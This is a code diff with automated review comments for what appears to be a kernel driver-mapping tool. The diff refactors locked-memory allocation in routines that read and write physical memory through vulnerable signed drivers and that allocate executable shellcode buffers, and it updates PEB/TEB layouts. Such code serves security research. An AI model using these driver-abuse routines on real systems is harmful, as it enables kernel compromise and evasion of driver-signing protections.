+ PAGE_READWRITE);
+
if (lockedBuffer) {
RtlCopyMemory(lockedBuffer, Buffer, NumberOfBytes);
- if (VirtualLock(lockedBuffer, NumberOfBytes)) {
-
- RtlSecureZeroMemory(&request, sizeof(request));
- request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
- request.SourceAddress = (ULONG_PTR)lockedBuffer;
- request.DestinationAddress = VirtualAddress;
- request.Length = NumberOfBytes;
-
- bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
- if (bResult == FALSE) {
- dwError = GetLastError();
- }
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.Header.FunctionId = NAL_FUNCID_MEMMOVE;
+ request.SourceAddress = (ULONG_PTR)lockedBuffer;
+ request.DestinationAddress = VirtualAddress;
+ request.Length = NumberOfBytes;
- VirtualUnlock(lockedBuffer, NumberOfBytes);
- }
- else {
+ bResult = NalCallDriver(DeviceHandle, &request, sizeof(request));
+ if (bResult == FALSE) {
dwError = GetLastError();
}
- VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
@@ -330,38 +321,33 @@ BOOL WINAPI NalReadVirtualMemoryEx(
{
BOOL bResult = FALSE;
DWORD dwError = ERROR_SUCCESS;
- PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
- if (lockedBuffer) {
-
- if (VirtualLock(lockedBuffer, NumberOfBytes)) {
+ PVOID lockedBuffer = (PVOID)supAllocateLockedMemory(NumberOfBytes,
+ MEM_RESERVE | MEM_COMMIT,
+ PAGE_READWRITE);
- ULONG_PTR physicalAddress, newVirt;
+ if (lockedBuffer) {
- if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physicalAddress)) {
- if (NalMapAddressEx(DeviceHandle, physicalAddress, &newVirt, NumberOfBytes)) {
+ ULONG_PTR physicalAddress, newVirt;
- bResult = NalReadVirtualMemory(DeviceHandle, newVirt, lockedBuffer, NumberOfBytes);
- if (bResult) {
- RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
- }
- else {
- dwError = GetLastError();
- }
+ if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physicalAddress)) {
+ if (NalMapAddressEx(DeviceHandle, physicalAddress, &newVirt, NumberOfBytes)) {
- NalUnmapAddress(DeviceHandle, newVirt, NumberOfBytes);
+ bResult = NalReadVirtualMemory(DeviceHandle, newVirt, lockedBuffer, NumberOfBytes);
+ if (bResult) {
+ RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes);
+ }
+ else {
+ dwError = GetLastError();
}
- }
- else {
- dwError = GetLastError();
- }
- VirtualUnlock(lockedBuffer, NumberOfBytes);
+ NalUnmapAddress(DeviceHandle, newVirt, NumberOfBytes);
+ }
}
else {
dwError = GetLastError();
}
- VirtualFree(lockedBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(lockedBuffer, NumberOfBytes);
}
else {
dwError = GetLastError();
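Review bot: When NalVirtualToPhysical succeeds but NalMapAddressEx fails, the inner `if` has no else branch, so bResult is FALSE while dwError remains ERROR_SUCCESS and the function presumably ends by publishing that via SetLastError. Assuming NalMapAddressEx sets the last error like its siblings, add `else { dwError = GetLastError(); }` after the inner `if (NalMapAddressEx(...)) { ... }` block. This gap predates the refactor but the retained structure keeps it; NalReadVirtualMemoryEx ends outside the hunk.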
diff --git a/Source/Hamakaze/idrv/ryzen.cpp b/Source/Hamakaze/idrv/ryzen.cpp
index 742e9aa..00e8c8c 100644
--- a/Source/Hamakaze/idrv/ryzen.cpp
+++ b/Source/Hamakaze/idrv/ryzen.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 07 Apr 2023
+* DATE: 14 Apr 2023
*
* AMD Ryzen Master Service Driver routines.
*
@@ -64,37 +64,32 @@ BOOL WINAPI RmReadPhysicalMemory(
SIZE_T size;
size = sizeof(RMDRV_REQUEST) + NumberOfBytes;
- pRequest = (RMDRV_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (RMDRV_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_AMDRM_READ_MEMORY,
+ pRequest,
+ sizeof(RMDRV_REQUEST),
+ pRequest,
+ (ULONG)size);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_AMDRM_READ_MEMORY,
- pRequest,
- sizeof(RMDRV_REQUEST),
- pRequest,
- (ULONG)size);
+ if (bResult) {
- if (bResult) {
-
- RtlCopyMemory(
- Buffer,
- RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
- NumberOfBytes);
-
- }
+ RtlCopyMemory(
+ Buffer,
+ RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
+ NumberOfBytes);
- VirtualUnlock(pRequest, size);
}
- VirtualFree(pRequest, 0, MEM_RELEASE);
-
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
@@ -120,33 +115,28 @@ BOOL WINAPI RmWritePhysicalMemory(
size = sizeof(RMDRV_REQUEST) + NumberOfBytes;
- pRequest = (RMDRV_REQUEST*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (RMDRV_REQUEST*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
-
- pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
- pRequest->Size = NumberOfBytes;
+ pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+ pRequest->Size = NumberOfBytes;
- RtlCopyMemory(
- RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
- Buffer,
- NumberOfBytes);
-
- bResult = supCallDriver(DeviceHandle,
- IOCTL_AMDRM_WRITE_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- VirtualUnlock(pRequest, size);
- }
+ RtlCopyMemory(
+ RtlOffsetToPointer(pRequest, sizeof(RMDRV_REQUEST)),
+ Buffer,
+ NumberOfBytes);
- VirtualFree(pRequest, 0, MEM_RELEASE);
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_AMDRM_WRITE_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
+ supFreeLockedMemory(pRequest, size);
}
return bResult;
diff --git a/Source/Hamakaze/idrv/winio.cpp b/Source/Hamakaze/idrv/winio.cpp
index 5951198..3992529 100644
--- a/Source/Hamakaze/idrv/winio.cpp
+++ b/Source/Hamakaze/idrv/winio.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: WINIO.CPP
*
-* VERSION: 1.27
+* VERSION: 1.31
*
-* DATE: 11 Nov 2022
+* DATE: 14 Apr 2023
*
* WINIO based drivers routines.
*
diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp
index 608a4f6..99743c3 100644
--- a/Source/Hamakaze/idrv/winring0.cpp
+++ b/Source/Hamakaze/idrv/winring0.cpp
@@ -4,9 +4,9 @@
*
* TITLE: WINRING0.CPP
*
-* VERSION: 1.30
+* VERSION: 1.31
*
-* DATE: 20 Mar 2023
+* DATE: 14 Apr 2023
*
* WinRing0 based drivers routines.
*
@@ -20,6 +20,13 @@
#include "global.h"
#include "idrv/winring0.h"
+//
+// WARNING, (BUG)FEATURE ALERT
+//
+// WinRing0 crapware does not check API call results.
+// This will eventually lead to BSOD in case of mapping failure.
+//
+
/*
* WRZeroReadPhysicalMemory
*
@@ -72,34 +79,28 @@ BOOL WINAPI WRZeroWritePhysicalMemory(
value = FIELD_OFFSET(OLS_WRITE_MEMORY_INPUT, Data) + NumberOfBytes;
size = ALIGN_UP_BY(value, PAGE_SIZE);
- pRequest = (OLS_WRITE_MEMORY_INPUT*)VirtualAlloc(NULL, size,
- MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ pRequest = (OLS_WRITE_MEMORY_INPUT*)supAllocateLockedMemory(size,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_READWRITE);
if (pRequest) {
- if (VirtualLock(pRequest, size)) {
-
- pRequest->Address.QuadPart = PhysicalAddress;
- pRequest->UnitSize = 1;
- pRequest->Count = NumberOfBytes;
- RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
+ pRequest->Address.QuadPart = PhysicalAddress;
+ pRequest->UnitSize = 1;
+ pRequest->Count = NumberOfBytes;
+ RtlCopyMemory(&pRequest->Data, Buffer, NumberOfBytes);
- bResult = supCallDriver(DeviceHandle,
- IOCTL_OLS_WRITE_MEMORY,
- pRequest,
- (ULONG)size,
- NULL,
- 0);
-
- if (!bResult)
- dwError = GetLastError();
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_OLS_WRITE_MEMORY,
+ pRequest,
+ (ULONG)size,
+ NULL,
+ 0);
- VirtualUnlock(pRequest, size);
- }
- else {
+ if (!bResult)
dwError = GetLastError();
- }
- VirtualFree(pRequest, 0, MEM_RELEASE);
+
+ supFreeLockedMemory(pRequest, size);
}
SetLastError(dwError);
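Review bot: The removed `else { dwError = GetLastError(); }` for the VirtualLock failure has no counterpart in the new code, so when supAllocateLockedMemory returns NULL the function falls through to `SetLastError(dwError);` with ERROR_SUCCESS and the allocation/lock error is lost — a regression against the old lines in this hunk. Re-add `else { dwError = GetLastError(); }` after the `if (pRequest) { ... }` block. WRZeroWritePhysicalMemory starts and ends outside the hunk.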
diff --git a/Source/Hamakaze/shellcode.cpp b/Source/Hamakaze/shellcode.cpp
index 44083ea..db0fbc8 100644
--- a/Source/Hamakaze/shellcode.cpp
+++ b/Source/Hamakaze/shellcode.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 09 Apr 2023
+* DATE: 14 Apr 2023
*
* Default driver mapping shellcode(s) implementation.
*
@@ -1752,8 +1752,7 @@ VOID ScFree(
_In_ ULONG ScSize
)
{
- VirtualUnlock(ScBuffer, ScSize);
- VirtualFree(ScBuffer, 0, MEM_RELEASE);
+ supFreeLockedMemory(ScBuffer, ScSize);
}
/*
@@ -1850,18 +1849,13 @@ PVOID ScAllocate(
#endif
}
- pvShellCode = (SHELLCODE*)VirtualAlloc(NULL, scSize,
+ pvShellCode = (SHELLCODE*)supAllocateLockedMemory(scSize,
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
return NULL;
- if (!VirtualLock(pvShellCode, scSize)) {
- VirtualFree(pvShellCode, 0, MEM_RELEASE);
- return NULL;
- }
-
pvBootstrap = pvShellCode->BootstrapCode;
switch (ShellVersion) {
diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp
index 522a9a1..68c1754 100644
--- a/Source/Hamakaze/sup.cpp
+++ b/Source/Hamakaze/sup.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.31
*
-* DATE: 08 Apr 2023
+* DATE: 14 Apr 2023
*
* Program global support routines.
*
@@ -48,6 +48,71 @@ BOOL FORCEINLINE supHeapFree(
return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);
}
+/*
+* supAllocateLockedMemory
+*
+* Purpose:
+*
+* Wrapper for VirtualAllocEx+VirtualLock.
+*
+*/
+PVOID supAllocateLockedMemory(
+ _In_ SIZE_T Size,
+ _In_ ULONG AllocationType,
+ _In_ ULONG Protect
+)
+{
+ PVOID Buffer = NULL;
+
+ Buffer = VirtualAllocEx(NtCurrentProcess(),
+ NULL,
+ Size,
+ AllocationType,
+ Protect);
+
+ if (Buffer) {
+
+ if (!VirtualLock(Buffer, Size)) {
+
+ VirtualFreeEx(NtCurrentProcess(),
+ Buffer,
+ 0,
+ MEM_RELEASE);
+
+ Buffer = NULL;
+
+ }
+
+ }
+
+ return Buffer;
+}
+
+/*
+* supFreeLockedMemory
+*
+* Purpose:
+*
+* Wrapper for VirtualUnlock + VirtualFreeEx.
+*
+*/
+BOOL supFreeLockedMemory(
+ _In_ PVOID Memory,
+ _In_ SIZE_T LockedSize
+)
+{
+ if (VirtualUnlock(Memory, LockedSize)) {
+
+ return VirtualFreeEx(NtCurrentProcess(),
+ Memory,
+ 0,
+ MEM_RELEASE);
+
+ }
+
+ return FALSE;
+}
+
/*
* supCallDriverEx
*
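Review bot: supFreeLockedMemory skips VirtualFreeEx when VirtualUnlock fails, so a failed unlock leaks the whole allocation, and every caller introduced in this commit ignores the return value, so the leak is silent. In supAllocateLockedMemory the VirtualFreeEx on the VirtualLock-failure path may overwrite the last-error value that the nal.cpp callers read with GetLastError() immediately after the NULL return; save it before the free and restore it afterwards. The rewritten bodies are below; the VirtualAllocEx call itself is unchanged.
```cpp
PVOID supAllocateLockedMemory(
    _In_ SIZE_T Size,
    _In_ ULONG AllocationType,
    _In_ ULONG Protect
)
{
    // ... unchanged: VirtualAllocEx call into Buffer ...
    if (Buffer) {
        if (!VirtualLock(Buffer, Size)) {
            // Preserve the VirtualLock error; VirtualFreeEx may overwrite it.
            DWORD dwError = GetLastError();
            VirtualFreeEx(NtCurrentProcess(), Buffer, 0, MEM_RELEASE);
            Buffer = NULL;
            SetLastError(dwError);
        }
    }
    return Buffer;
}

BOOL supFreeLockedMemory(
    _In_ PVOID Memory,
    _In_ SIZE_T LockedSize
)
{
    // Release the pages even if unlock fails, otherwise a failed
    // VirtualUnlock leaks the allocation.
    BOOL bUnlocked = VirtualUnlock(Memory, LockedSize);
    BOOL bFreed = VirtualFreeEx(NtCurrentProcess(), Memory, 0, MEM_RELEASE);
    return (bUnlocked && bFreed);
}
```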
diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h
index bfc69b1..3b96aa7 100644
--- a/Source/Hamakaze/sup.h
+++ b/Source/Hamakaze/sup.h
@@ -113,6 +113,15 @@ PVOID FORCEINLINE supHeapAlloc(
BOOL FORCEINLINE supHeapFree(
_In_ PVOID Memory);
+PVOID supAllocateLockedMemory(
+ _In_ SIZE_T Size,
+ _In_ ULONG AllocationType,
+ _In_ ULONG Protect);
+
+BOOL supFreeLockedMemory(
+ _In_ PVOID Memory,
+ _In_ SIZE_T LockedSize);
+
PVOID supMapPhysicalMemory(
_In_ HANDLE SectionHandle,
_In_ ULONG_PTR PhysicalAddress,
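Review bot: The new declarations carry no contract: nothing says that memory returned by supAllocateLockedMemory must be released with supFreeLockedMemory rather than VirtualFree, or that LockedSize has to equal the Size passed at allocation. Consider a comment above `PVOID supAllocateLockedMemory(`: `// Allocates and locks a region via VirtualAllocEx/VirtualLock; returns NULL if either step fails. Release with supFreeLockedMemory, passing the same size.`, and above `BOOL supFreeLockedMemory(`: `// Unlocks and releases a region obtained from supAllocateLockedMemory; LockedSize must match the allocation size.`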
diff --git a/Source/Shared/ntos/ntbuilds.h b/Source/Shared/ntos/ntbuilds.h
index c7c5d8d..62316ed 100644
--- a/Source/Shared/ntos/ntbuilds.h
+++ b/Source/Shared/ntos/ntbuilds.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2021 - 2022
+* (C) COPYRIGHT AUTHORS, 2021 - 2023
*
* TITLE: NTBUILDS.H
*
-* VERSION: 1.13
+* VERSION: 1.15
*
-* DATE: 16 Oct 2022
+* DATE: 11 Apr 2023
*
* Windows NT builds definition file.
*
@@ -86,4 +86,4 @@
#define NT_WIN11_22H2 22621
// Windows 11 Active Develepment Branch (23H2)
-#define NTX_WIN11_ADB 25217
+#define NTX_WIN11_ADB 25330
diff --git a/Source/Shared/ntos/ntos.h b/Source/Shared/ntos/ntos.h
index f985a2c..7d0bcb8 100644
--- a/Source/Shared/ntos/ntos.h
+++ b/Source/Shared/ntos/ntos.h
@@ -5,9 +5,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.207
+* VERSION: 1.210
*
-* DATE: 01 Apr 2023
+* DATE: 11 Apr 2023
*
* Common header file for the ntos API functions and definitions.
*
@@ -6049,6 +6049,9 @@ typedef struct _GDI_SHARED_MEMORY {
#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)
#endif
+typedef struct _ACTIVATION_CONTEXT_DATA * PACTIVATION_CONTEXT_DATA;
+typedef struct _ASSEMBLY_STORAGE_MAP * PASSEMBLY_STORAGE_MAP;
+
typedef struct _CURDIR {
UNICODE_STRING DosPath;
HANDLE Handle;
@@ -6099,17 +6102,20 @@ typedef struct _RTL_USER_PROCESS_PARAMETERS {
UNICODE_STRING RuntimeData;
RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
- ULONG EnvironmentSize;
- ULONG EnvironmentVersion;
- PVOID PackageDependencyData; //8+
+ ULONG_PTR EnvironmentSize;
+ ULONG_PTR EnvironmentVersion;
+
+ PVOID PackageDependencyData;
ULONG ProcessGroupId;
- // ULONG LoaderThreads;
- // UNICODE_STRING RedirectionDllName;
- // UNICODE_STRING HeapPartitionName;
- // ULONGLONG* DefaultThreadpoolCpuSetMasks;
- // ULONG DefaultThreadpoolCpuSetMaskCount;
- // ULONG DefaultThreadpoolThreadMaximum;
-} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
+ ULONG LoaderThreads;
+
+ UNICODE_STRING RedirectionDllName; // RS4
+ UNICODE_STRING HeapPartitionName; // 19H1
+ ULONG_PTR DefaultThreadpoolCpuSetMasks;
+ ULONG DefaultThreadpoolCpuSetMaskCount;
+ ULONG DefaultThreadpoolThreadMaximum;
+ ULONG HeapMemoryTypeMask; // WIN11
+} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
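Review bot: These structures are now declared as the newest Windows layout (fields tagged RS4, 19H1, WIN11) without a compile-time size check, so an alignment slip in any of the uncommented tails silently shifts every later field; the same applies to the PEB hunks ending at `} PEB, * PPEB;` and the TEB hunks ending at `} TEB, * PTEB;`. Adding `C_ASSERT(sizeof(PEB) == <expected x64 size>);` and the TEB equivalent under `#ifdef _WIN64` (with the x86 sizes in the `#else` branch) would pin the layout against the reference the fields were taken from. `ULONG_PTR DefaultThreadpoolCpuSetMasks;` replaces what the removed comment had as `ULONGLONG* DefaultThreadpoolCpuSetMasks;`; the size matches but the pointer type is lost, so either keep the pointer type or add `// pointer-sized; points at the CPU set mask array` so readers do not treat it as a value. Fields at these offsets hold different data on older builds (the removed Fls* members of the PEB, for instance), so any code that reads them should gate on the build number first.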
@@ -6130,6 +6136,7 @@ typedef struct _PEB {
BOOLEAN IsLongPathAwareProcess : 1;
};
};
+
HANDLE Mutant;
PVOID ImageBaseAddress;
@@ -6138,8 +6145,9 @@ typedef struct _PEB {
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
- PVOID AtlThunkSListPtr;
+ PSLIST_HEADER AtlThunkSListPtr;
PVOID IFEOKey;
+
union
{
ULONG CrossProcessFlags;
@@ -6152,25 +6160,26 @@ typedef struct _PEB {
ULONG ProcessUsingFTH : 1;
ULONG ProcessPreviouslyThrottled : 1;
ULONG ProcessCurrentlyThrottled : 1;
- ULONG ProcessImagesHotPatched : 1;
+ ULONG ProcessImagesHotPatched : 1; // RS5
ULONG ReservedBits0 : 24;
};
- ULONG EnvironmentUpdateCount;
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
- ULONG SystemReserved[1];
+ ULONG SystemReserved;
ULONG AtlThunkSListPtr32;
PVOID ApiSetMap;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[2];
+
PVOID ReadOnlySharedMemoryBase;
- PVOID HotpatchInformation;
- PVOID *ReadOnlyStaticServerData;
+ struct _SILO_USER_SHARED_DATA* SharedData;
+ PVOID* ReadOnlyStaticServerData;
+
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
@@ -6178,7 +6187,7 @@ typedef struct _PEB {
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
- LARGE_INTEGER CriticalSectionTimeout;
+ ULARGE_INTEGER CriticalSectionTimeout;
SIZE_T HeapSegmentReserve;
SIZE_T HeapSegmentCommit;
SIZE_T HeapDeCommitTotalFreeThreshold;
@@ -6186,7 +6195,7 @@ typedef struct _PEB {
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
- PVOID *ProcessHeaps;
+ PVOID* ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
@@ -6202,7 +6211,7 @@ typedef struct _PEB {
ULONG ImageSubsystem;
ULONG ImageSubsystemMajorVersion;
ULONG ImageSubsystemMinorVersion;
- ULONG_PTR ImageProcessAffinityMask;
+ KAFFINITY ActiveProcessAffinityMask;
GDI_HANDLE_BUFFER GdiHandleBuffer;
PVOID PostProcessInitRoutine;
@@ -6218,22 +6227,35 @@ typedef struct _PEB {
UNICODE_STRING CSDVersion;
- PVOID ActivationContextData;
- PVOID ProcessAssemblyStorageMap;
- PVOID SystemDefaultActivationContextData;
- PVOID SystemAssemblyStorageMap;
+ PACTIVATION_CONTEXT_DATA ActivationContextData;
+ PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap;
+ PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData;
+ PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap;
SIZE_T MinimumStackCommit;
- PVOID *FlsCallback;
- LIST_ENTRY FlsListHead;
- PVOID FlsBitmap;
- ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
- ULONG FlsHighIndex;
+ PVOID SparePointers[2];
+ PVOID PatchLoaderData;
+ PVOID ChpeV2ProcessInfo;
+
+ ULONG AppModelFeatureState;
+ ULONG SpareUlongs[2];
+
+ USHORT ActiveCodePage;
+ USHORT OemCodePage;
+ USHORT UseCaseMapping;
+ USHORT UnusedNlsField;
PVOID WerRegistrationData;
PVOID WerShipAssertPtr;
- PVOID pContextData;
+
+ union
+ {
+ PVOID pContextData;
+ PVOID pUnused;
+ PVOID EcCodeBitMap;
+ };
+
PVOID pImageHeaderHash;
union
{
@@ -6247,27 +6269,27 @@ typedef struct _PEB {
};
};
ULONGLONG CsrServerReadOnlySharedMemoryBase;
- //ULONGLONG TppWorkerpListLock;
- //LIST_ENTRY TppWorkerpList;
- //PVOID WaitOnAddressHashTable[128];
- //PVOID TelemetryCoverageHeader;
- //ULONG CloudFileFlags;
- //ULONG CloudFileDiagFlags;
- //CHAR PlaceholderCompatibilityMode;
- //CHAR PlaceholderCompatibilityModeReserved[7];
- //struct _LEAP_SECOND_DATA* LeapSecondData;
- //union
- //{
- // ULONG LeapSecondFlags;
- // struct
- // {
- // ULONG SixtySecondEnabled : 1;
- // ULONG Reserved : 31;
- // };
- //};
- //ULONG NtGlobalFlag2;
- //ULONG64 ExtendedFeatureDisableMask;
-} PEB, *PPEB;
+ PRTL_CRITICAL_SECTION TppWorkerpListLock;
+ LIST_ENTRY TppWorkerpList;
+ PVOID WaitOnAddressHashTable[128];
+ PVOID TelemetryCoverageHeader; // RS3
+ ULONG CloudFileFlags;
+ ULONG CloudFileDiagFlags; // RS4
+ CHAR PlaceholderCompatibilityMode;
+ CHAR PlaceholderCompatibilityModeReserved[7];
+ struct _LEAP_SECOND_DATA* LeapSecondData; // RS5
+ union
+ {
+ ULONG LeapSecondFlags;
+ struct
+ {
+ ULONG SixtySecondEnabled : 1;
+ ULONG Reserved : 31;
+ };
+ };
+ ULONG NtGlobalFlag2;
+ ULONGLONG ExtendedFeatureDisableMask; // since WIN11
+} PEB, * PPEB;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
ULONG Flags;
@@ -6289,6 +6311,64 @@ typedef struct _GDI_TEB_BATCH {
ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
+typedef struct _ACTIVATION_CONTEXT_DATA {
+ ULONG Magic;
+ ULONG HeaderSize;
+ ULONG FormatVersion;
+ ULONG TotalSize;
+ ULONG DefaultTocOffset;
+ ULONG ExtendedTocOffset;
+ ULONG AssemblyRosterOffset;
+ ULONG Flags;
+} ACTIVATION_CONTEXT_DATA, * PACTIVATION_CONTEXT_DATA;
+
+typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY {
+ ULONG Flags;
+ UNICODE_STRING DosPath;
+ HANDLE Handle;
+} ASSEMBLY_STORAGE_MAP_ENTRY, * PASSEMBLY_STORAGE_MAP_ENTRY;
+
+typedef struct _ASSEMBLY_STORAGE_MAP {
+ ULONG Flags;
+ ULONG AssemblyCount;
+ PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray;
+} ASSEMBLY_STORAGE_MAP, * PASSEMBLY_STORAGE_MAP;
+
+typedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)(
+ _In_ ULONG NotificationType,
+ _In_ struct _ACTIVATION_CONTEXT* ActivationContext,
+ _In_ PACTIVATION_CONTEXT_DATA ActivationContextData,
+ _In_opt_ PVOID NotificationContext,
+ _In_opt_ PVOID NotificationData,
+ _Inout_ PBOOLEAN DisableThisNotification
+ );
+
+typedef struct _ACTIVATION_CONTEXT {
+ LONG RefCount;
+ ULONG Flags;
+ PACTIVATION_CONTEXT_DATA ActivationContextData;
+ PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine;
+ PVOID NotificationContext;
+ ULONG SentNotifications[8];
+ ULONG DisabledNotifications[8];
+ ASSEMBLY_STORAGE_MAP StorageMap;
+ PASSEMBLY_STORAGE_MAP_ENTRY InlineStorageMapEntries[32];
+} ACTIVATION_CONTEXT, * PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+ struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+ PACTIVATION_CONTEXT ActivationContext;
+ ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+ PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+ LIST_ENTRY FrameListCache;
+ ULONG Flags;
+ ULONG NextCookieSequenceNumber;
+ ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
typedef struct _TEB {
NT_TIB NtTib;
@@ -6307,16 +6387,39 @@ typedef struct _TEB {
PVOID WOW32Reserved;
LCID CurrentLocale;
ULONG FpSoftwareStatusRegister;
- PVOID SystemReserved1[54];
- NTSTATUS ExceptionCode;
- PVOID ActivationContextStackPointer;
-#if defined(_M_X64)
- UCHAR SpareBytes[24];
+ PVOID ReservedForDebuggerInstrumentation[16];
+#ifdef _WIN64
+ PVOID SystemReserved1[30];
#else
- UCHAR SpareBytes[36];
+ PVOID SystemReserved1[26];
#endif
+
+ CHAR PlaceholderCompatibilityMode;
+ BOOLEAN PlaceholderHydrationAlwaysExplicit;
+ CHAR PlaceholderReserved[10];
+
+ ULONG ProxiedProcessId;
+ ACTIVATION_CONTEXT_STACK ActivationStack;
+
+ UCHAR WorkingOnBehalfTicket[8];
+ NTSTATUS ExceptionCode;
+
+ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+ ULONG_PTR InstrumentationCallbackSp;
+ ULONG_PTR InstrumentationCallbackPreviousPc;
+ ULONG_PTR InstrumentationCallbackPreviousSp;
+#ifdef _WIN64
ULONG TxFsContext;
+#endif
+ BOOLEAN InstrumentationCallbackDisabled;
+#ifdef _WIN64
+ BOOLEAN UnalignedLoadStoreExceptions;
+#endif
+#ifndef _WIN64
+ UCHAR SpareBytes[23];
+ ULONG TxFsContext;
+#endif
GDI_TEB_BATCH GdiTebBatch;
CLIENT_ID RealClientId;
HANDLE GdiCachedProcessHandle;
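Review bot: The guard change from `#if defined(_M_X64)` to `#ifdef _WIN64` (here and in the later TEB hunks at `PVOID Instrumentation[11];` and `PVOID DeallocationBStore;`) widens the 64-bit branch to every 64-bit target, including ARM64, where `_M_X64` was previously false; if ARM64 is not a supported target this is harmless, but it deserves a line in the commit message or a `// _WIN64: x64 and ARM64 share this layout` comment at the first guard. The `#ifndef _WIN64` block declares `ULONG TxFsContext;` after `UCHAR SpareBytes[23];` for 32-bit while the 64-bit declaration sits before `InstrumentationCallbackDisabled`; a one-line comment noting that the two placements mirror the differing 32/64-bit layouts would stop the next reader from assuming a copy-paste error. The enclosing `_TEB` definition starts before this hunk and ends after it.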
@@ -6346,7 +6449,7 @@ typedef struct _TEB {
PVOID DbgSsReserved[2];
ULONG HardErrorMode;
-#if defined(_M_X64)
+#ifdef _WIN64
PVOID Instrumentation[11];
#else
PVOID Instrumentation[9];
@@ -6354,7 +6457,7 @@ typedef struct _TEB {
GUID ActivityId;
PVOID SubProcessTag;
- PVOID EtwLocalData;
+ PVOID PerflibData;
PVOID EtwTraceData;
PVOID WinSockData;
ULONG GdiBatchCount;
@@ -6374,13 +6477,13 @@ typedef struct _TEB {
ULONG GuaranteedStackBytes;
PVOID ReservedForPerf;
